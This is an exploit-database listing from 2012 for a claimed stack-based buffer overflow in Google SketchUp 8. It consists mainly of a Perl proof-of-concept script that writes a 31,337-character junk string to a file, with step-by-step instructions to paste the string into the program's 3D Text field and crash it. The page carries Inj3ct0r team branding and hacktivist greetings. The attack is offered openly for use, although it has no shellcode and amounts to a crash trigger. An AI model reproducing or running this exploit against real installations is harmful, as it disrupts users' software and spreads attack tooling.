Google SketchUp 8 - Stack Based Buffer Overflow Vulnerability



EKU-ID: 2744 CVE: OSVDB-ID:
Author: NuxbieCyber Published: 2012-10-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl
# 
# 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0          _                   __           __       __                         1
# 1        /' \            __  /'__`\        /\ \__  /'__`\                       0
# 0       /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___               1
# 1       \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\              0
# 0          \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/               1
# 1           \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\               0
# 0            \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/               1
# 1                       \ \____/ >> Exploit database separated by exploit       0
# 0                        \/___/          type (local, remote, DoS, etc.)        1
# 1                                                                               0
# 0       [x] Official Website: http://www.1337day.com                            1
# 1       [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                      0
# 0                                                                               1
# 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
# 0                  I'm NuxbieCyber Member From Inj3ct0r TEAM                    1
# 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#
# Title  : Google SketchUp 8 - Stack Based Buffer Overflow Vulnerability.
# Author : NuxbieCyber
# Link   : http://sketchup.google.com/download/
# Type   : Local.
# Risk   : Critical.
# Vendor : Google Inc.
# Version: Google SketchUp 8.

# Tested On  : Windows XP Service Pack 2 ID 32x.
# Time & Date: 26 Oktober 2012 - 01:15 PM.

# Execute: perl google-su.pl
# Open with Notepad++ file BoF.txt, Select ALL , then Copy.
# After copying the whole line,
# Go To Google SketchUp --> Tools --> 3D Text --> Place 3D Text --> Paste the line into field and click Place.

my $junk = "A" x 31337 ;
 
$payload= $junk;
open(myfile,'>BoF.txt');
print myfile $payload;
close(myfile);
print "cr00ted ".length($payload)." bytes\n";

# - Special Thanks:
# ...:::' 1337day - Inj3ct0r TEAM ':::...
# BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,,
# , And All Inj3ct0r Fans & All Hacktivist,,,

# NuxbieSec